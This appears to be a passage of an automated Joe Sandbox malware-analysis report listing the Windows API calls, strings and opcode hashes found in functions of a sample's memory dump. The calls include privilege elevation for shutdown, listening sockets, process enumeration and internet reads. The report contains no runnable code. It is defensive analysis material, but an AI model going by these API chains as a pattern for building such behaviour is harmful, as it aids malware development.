                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 2649000838-1173974218
                                                        • Opcode ID: f5bab947efad50e289f0705d15344e14c441b4636a1082fd467e321fa8629050
                                                        • Instruction ID: ec5f79c0760c7d230123f896d05f67ddadd1895dd0c99070a38c77fae077b5cb
                                                        • Opcode Fuzzy Hash: f5bab947efad50e289f0705d15344e14c441b4636a1082fd467e321fa8629050
                                                        • Instruction Fuzzy Hash: F0317035008385AFC302EF24C891DAFB7EDAE92314F404D2DF4D59A192EB25EA09C763
                                                        APIs
                                                          • Part of subcall function 003987E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039882B
                                                          • Part of subcall function 003987E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00398858
                                                          • Part of subcall function 003987E1: GetLastError.KERNEL32 ref: 00398865
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 003A51F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                        • String ID: $@$SeShutdownPrivilege
                                                        • API String ID: 2234035333-194228
                                                        • Opcode ID: f7f42be1082fde7c0280a66aff791ab93001828b980e6cbc86213e37ef230e39
                                                        • Instruction ID: 7074c90540551c7757965a1c90def602ee5de36ae80d1920e15e19e91696c3ca
                                                        • Opcode Fuzzy Hash: f7f42be1082fde7c0280a66aff791ab93001828b980e6cbc86213e37ef230e39
                                                        • Instruction Fuzzy Hash: FE01F7316916156BEB2F63689C8AFBA725CEB07750F210C20F913E60D2D9516C008690
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006), ref: 003B62DC
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003B62EB
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 003B6307
                                                        • listen.WSOCK32(00000000,00000005), ref: 003B6316
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003B6330
                                                        • closesocket.WSOCK32(00000000), ref: 003B6344
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                        • String ID:
                                                        • API String ID: 1279440585-0
                                                        • Opcode ID: 57372b381d0d17761c55210a35a42f63c800b00182e8cb9d4119ca7c093046ff
                                                        • Instruction ID: 6c37d2231a1ca45ce9e08ce1d6240b0282731a7405135f36895ef4abdd2feca7
                                                        • Opcode Fuzzy Hash: 57372b381d0d17761c55210a35a42f63c800b00182e8cb9d4119ca7c093046ff
                                                        • Instruction Fuzzy Hash: 1B21D0346002009FCB12EF68CC46FAEB7E9EF49324F154159E91AEB3A2C770AC01CB51
                                                        APIs
                                                          • Part of subcall function 00360DB6: std::exception::exception.LIBCMT ref: 00360DEC
                                                          • Part of subcall function 00360DB6: __CxxThrowException@8.LIBCMT ref: 00360E01
                                                        • _memmove.LIBCMT ref: 00390258
                                                        • _memmove.LIBCMT ref: 0039036D
                                                        • _memmove.LIBCMT ref: 00390414
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1300846289-0
                                                        • Opcode ID: 5500d47c25f20e564abca7f22cb17f725ae6459851412b7dbc465c6bbdb2838e
                                                        • Instruction ID: f772f7c024799d717d963039d51ddca204a6910f54879d3a46a8c7880d749836
                                                        • Opcode Fuzzy Hash: 5500d47c25f20e564abca7f22cb17f725ae6459851412b7dbc465c6bbdb2838e
                                                        • Instruction Fuzzy Hash: 3202B0B0A00209DFCF0ADF64D992AAE7BF9EF44300F158469E806DF255EB35E954CB91
                                                        APIs
                                                          • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 003419FA
                                                        • GetSysColor.USER32(0000000F), ref: 00341A4E
                                                        • SetBkColor.GDI32(?,00000000), ref: 00341A61
                                                          • Part of subcall function 00341290: DefDlgProcW.USER32(?,00000020,?), ref: 003412D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ColorProc$LongWindow
                                                        • String ID:
                                                        • API String ID: 3744519093-0
                                                        • Opcode ID: 4123e44afd030fcf071d55c5dd540e3b131a85a96af93c4e68c44e445c5f1773
                                                        • Instruction ID: 99834bb1d113bd87521a46ea06cfa30320817d8261ae96e5c56502674775ee1b
                                                        • Opcode Fuzzy Hash: 4123e44afd030fcf071d55c5dd540e3b131a85a96af93c4e68c44e445c5f1773
                                                        • Instruction Fuzzy Hash: DAA16971112D44BAE63BAF284C48F7F69ECDF42341F16411AF506DE592CB28BD8097B6
                                                        APIs
                                                          • Part of subcall function 003B7D8B: inet_addr.WSOCK32(00000000), ref: 003B7DB6
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 003B679E
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003B67C7
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 003B6800
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003B680D
                                                        • closesocket.WSOCK32(00000000), ref: 003B6821
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 99427753-0
                                                        • Opcode ID: 51fa0b573bda185bbf20488eae7053718c3d92373bf77ed0c4756f3000afc07a
                                                        • Instruction ID: 5e1b8fab46410d5b149c213d16408d35c86d43c7a8c9c03b738be7665dc101c5
                                                        • Opcode Fuzzy Hash: 51fa0b573bda185bbf20488eae7053718c3d92373bf77ed0c4756f3000afc07a
                                                        • Instruction Fuzzy Hash: 7441B275A00210AFDB12BF288C87F6E77E8DB49754F048459FA1AAF3D3CA74AD008791
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                        • String ID:
                                                        • API String ID: 292994002-0
                                                        • Opcode ID: 1d09857419589813801ac6a2056b75c074ae8309de2d7468dbe28249ae304827
                                                        • Instruction ID: d9c8e54513acb14a77d97c72998329e9d5d6865f54dc869fbfa0a4a23bf8ae1a
                                                        • Opcode Fuzzy Hash: 1d09857419589813801ac6a2056b75c074ae8309de2d7468dbe28249ae304827
                                                        • Instruction Fuzzy Hash: AE119D323009516FEB236F269C44F6ABB9DEF857A1F41402DE846DB241CBB0FC418BA4
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003980C0
                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003980CA
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003980D9
                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003980E0
                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003980F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: d7d15ca5b36222417ba6a43bf8b462638834c1046e458072353cafc882181cb3
                                                        • Instruction ID: 9a0ea64316a5eecc29eb6d71c08c63f9562b6483a49f3e5bfe7a2730969f0a23
                                                        • Opcode Fuzzy Hash: d7d15ca5b36222417ba6a43bf8b462638834c1046e458072353cafc882181cb3
                                                        • Instruction Fuzzy Hash: BCF04F35240214AFEB120FA6EC8DE673BADFF8A755F040029F945D6150CA61AC41DB60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Dd@$Dd@$Dd@$Dd@$Variable must be of type 'Object'.
                                                        • API String ID: 0-2845646731
                                                        • Opcode ID: 7d7f3b884b36f67610af19c338e4ea15ca08f7e41ac5184a045e7601f851c152
                                                        • Instruction ID: 817357476d068a017c31f062f03d4a0e8f7a0827326816ab117606ec38541f37
                                                        • Opcode Fuzzy Hash: 7d7f3b884b36f67610af19c338e4ea15ca08f7e41ac5184a045e7601f851c152
                                                        • Instruction Fuzzy Hash: E7A26875A00205CFCB26DF58C480AAAB7F6FF59714F268469E806AF351D735BD82CB90
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00344AD0), ref: 00344B45
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00344B57
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                        • API String ID: 2574300362-192647395
                                                        • Opcode ID: 6dfdf27229594947d2f66b2f87cc7798faf2c81e2954a06524ef53cbbf3c3c61
                                                        • Instruction ID: 583d505e3d7a543390b1f12b9c8322af0a65bb62758155b0255515b24d0155b6
                                                        • Opcode Fuzzy Hash: 6dfdf27229594947d2f66b2f87cc7798faf2c81e2954a06524ef53cbbf3c3c61
                                                        • Instruction Fuzzy Hash: 3AD0EC74A10712CFDB229B31D818F4676D9AF05351B15883DD486D6160D770E880C755
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 003BEE3D
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 003BEE4B
                                                          • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 003BEF0B
                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 003BEF1A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                        • String ID:
                                                        • API String ID: 2576544623-0
                                                        • Opcode ID: 0dc41aee43acec5ae1ab278b924bbbb6a20b9d2200c8af5c01315ea902163a2a
                                                        • Instruction ID: e0d9cda8edfa72ccdc341621971c3f01904e52ccf831e88a6a73e30ab07ace28
                                                        • Opcode Fuzzy Hash: 0dc41aee43acec5ae1ab278b924bbbb6a20b9d2200c8af5c01315ea902163a2a
                                                        • Instruction Fuzzy Hash: DB516E71504311AFD322EF24CC85EABB7E8EF94714F10482DF5959A2A2EB70E904CB92
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0039E628
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: ($|
                                                        • API String ID: 1659193697-1631851259
                                                        • Opcode ID: d26becde781d3a0030bd08b519ed29408928fc47e367fb4c9f4220d068a29ddc
                                                        • Instruction ID: 48a8c3d03459a13af4b1324e2e581aebc9817e1016b86322546e2142bf6c06a4
                                                        • Opcode Fuzzy Hash: d26becde781d3a0030bd08b519ed29408928fc47e367fb4c9f4220d068a29ddc
                                                        • Instruction Fuzzy Hash: 9D323575A007059FDB29CF59C48196AB7F0FF48320B16C56EE89ADB7A1EB70E941CB40
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003B180A,00000000), ref: 003B23E1
                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 003B2418
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                        • String ID:
                                                        • API String ID: 599397726-0
                                                        • Opcode ID: ccadac15502411f395de2f65d7c0b92516a23a24abf131bef915365c397713ce
                                                        • Instruction ID: 340effd3e2195669e26a47a13efb15d172eb3d8c1b4dfc7017b67b19466dc8de
                                                        • Opcode Fuzzy Hash: ccadac15502411f395de2f65d7c0b92516a23a24abf131bef915365c397713ce
                                                        • Instruction Fuzzy Hash: 74410375A00209BFEB129F96DC81EFFB7FCEB40318F10412AFB05A6940DA75AE419660
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 003AB343
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003AB39D
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 003AB3EA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID:
                                                        • API String ID: 1682464887-0
                                                        • Opcode ID: a8e4ac7a48814c3b48885f075d1b3a2e5723744257d156e8c8165b010ad281de
                                                        • Instruction ID: 4f4cf10a1668df735ce2aa66d2c2b5ed09551e36809f52fbb1c1f88c3378b771
                                                        • Opcode Fuzzy Hash: a8e4ac7a48814c3b48885f075d1b3a2e5723744257d156e8c8165b010ad281de
                                                        • Instruction Fuzzy Hash: F2214A35A00108EFCB01EFA5D885AAEBBF8FF49310F1480AAE905AB251CB31A915CB50
                                                        APIs
                                                          • Part of subcall function 00360DB6: std::exception::exception.LIBCMT ref: 00360DEC
                                                          • Part of subcall function 00360DB6: __CxxThrowException@8.LIBCMT ref: 00360E01
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039882B
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00398858
                                                        • GetLastError.KERNEL32 ref: 00398865
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1922334811-0
                                                        • Opcode ID: 61b1d6491e53edcaef54a44d1bfec13121852259eee7a8ab02fc0dd9817855e1
                                                        • Instruction ID: b6253fb34156ff0c18bbc780e7d8689c50d7887a44df6744afb8c37c2cc347a7
                                                        • Opcode Fuzzy Hash: 61b1d6491e53edcaef54a44d1bfec13121852259eee7a8ab02fc0dd9817855e1
                                                        • Instruction Fuzzy Hash: 73118CB2914204AFEB19DFA4DC86D6BBBFDFB45710B20852EF45697241EB30BC408B60
                                                        APIs
                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00398774
                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0039878B
                                                        • FreeSid.ADVAPI32(?), ref: 0039879B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                        • String ID:
                                                        • API String ID: 3429775523-0
                                                        • Opcode ID: 5d1b9ff6b09f8cea617652660a49daa9f8382c34d27752835a41ea7a53d8b296
                                                        • Instruction ID: 7bb7792eb57a3071366bfb6d80b8ce9481546e8e87c444381a243db257db4195
                                                        • Opcode Fuzzy Hash: 5d1b9ff6b09f8cea617652660a49daa9f8382c34d27752835a41ea7a53d8b296
                                                        • Instruction Fuzzy Hash: BCF03775A11208BFDF00DFE49C89EBEBBBDEF08701F1044A9A901E2181E6716A048B50
                                                        APIs
                                                        • __time64.LIBCMT ref: 003A889B
                                                          • Part of subcall function 0036520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,003A8F6E,00000000,?,?,?,?,003A911F,00000000,?), ref: 00365213
                                                          • Part of subcall function 0036520A: __aulldiv.LIBCMT ref: 00365233
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                        • String ID: 0e@
                                                        • API String ID: 2893107130-3044860656
                                                        • Opcode ID: 7d057725d77fc37a8757de344a27fa1aa65f35205f7e216064d8e5f3b0293379
                                                        • Instruction ID: f70d9ea28d30d17f97a80810b282382ab59756bfa5b6cd6144bf6d9e409c79a9
                                                        • Opcode Fuzzy Hash: 7d057725d77fc37a8757de344a27fa1aa65f35205f7e216064d8e5f3b0293379
                                                        • Instruction Fuzzy Hash: 1121AF326256108BC72ACF29D841A52B7E5EBA5311B698E6CD0F6CF2C0CE34A905CB94
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 003AC6FB
                                                        • FindClose.KERNEL32(00000000), ref: 003AC72B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 0ba1bb2c969c7dfcf2ba0e2404e9a5d78059d2fe7d83226a6e75d13cafecba8c
